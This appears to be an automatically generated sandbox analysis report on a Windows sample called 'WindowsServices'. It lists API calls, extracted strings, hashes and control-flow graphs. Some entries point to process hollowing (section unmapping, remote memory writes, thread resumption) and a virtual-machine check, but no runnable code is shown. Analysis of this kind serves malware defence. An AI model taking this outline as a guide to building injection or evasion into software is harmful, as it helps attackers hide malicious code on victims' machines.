                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 40b2a2-40b2b7 69FD4ED0
                                                                        APIs
                                                                        • 69FD4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystem$ClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1397294514-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1221 404ec0-404ef6 CopyRect call 403c20 1224 404f06-404f28 CopyRect call 403c20 1221->1224 1225 404ef8-404f03 1221->1225 1228 404f38-404f5a CopyRect call 403c20 1224->1228 1229 404f2a-404f35 1224->1229 1232 404f6a-404f8c CopyRect call 403c20 1228->1232 1233 404f5c-404f67 1228->1233 1236 404f9c-404fbe CopyRect call 403c20 1232->1236 1237 404f8e-404f99 1232->1237 1240 404fc0-404fcb 1236->1240 1241 404fce-404ff0 CopyRect call 403c20 1236->1241 1244 405000-405022 CopyRect call 403c20 1241->1244 1245 404ff2-404ffd 1241->1245 1248 405032-405054 CopyRect call 403c20 1244->1248 1249 405024-40502f 1244->1249 1252 405064-405086 CopyRect call 403c20 1248->1252 1253 405056-405061 1248->1253 1256 405096-4050b8 CopyRect call 403c20 1252->1256 1257 405088-405093 1252->1257 1260 4050c8-4050ea CopyRect call 403c20 1256->1260 1261 4050ba-4050c5 1256->1261 1264 4050fa-40511c CopyRect call 403c20 1260->1264 1265 4050ec-4050f7 1260->1265 1268 40512c-40514e CopyRect call 403c20 1264->1268 1269 40511e-405129 1264->1269 1272 405150-40515b 1268->1272 1273 40515e-405180 CopyRect call 403c20 1268->1273 1276 405190-4051b2 CopyRect call 403c20 1273->1276 1277 405182-40518d 1273->1277 1280 4051c2-4051e4 CopyRect call 403c20 1276->1280 1281 4051b4-4051bf 1276->1281 1284 4051f4-405216 CopyRect call 403c20 1280->1284 1285 4051e6-4051f1 1280->1285 1288 405226-405248 CopyRect call 403c20 1284->1288 1289 405218-405223 1284->1289 1292 405258-40527a CopyRect call 403c20 1288->1292 1293 40524a-405255 1288->1293 1296 40528a-4052b7 CopyRect call 403c20 1292->1296 1297 40527c-405287 1292->1297
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1300 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1303 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1300->1303 1304 40b186-40b191 __setusermatherr 1300->1304 1307 40b225-40b228 1303->1307 1308 40b1eb-40b1f3 1303->1308 1304->1303 1309 40b202-40b206 1307->1309 1310 40b22a-40b22e 1307->1310 1311 40b1f5-40b1f7 1308->1311 1312 40b1f9-40b1fc 1308->1312 1314 40b208-40b20a 1309->1314 1315 40b20c-40b21d GetStartupInfoA 1309->1315 1310->1307 1311->1308 1311->1312 1312->1309 1313 40b1fe-40b1ff 1312->1313 1313->1309 1314->1313 1314->1315 1316 40b230-40b232 1315->1316 1317 40b21f-40b223 1315->1317 1318 40b233-40b23e GetModuleHandleA call 40b2a2 1316->1318 1317->1318 1320 40b243-40b260 exit _XcptFilter 1318->1320
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
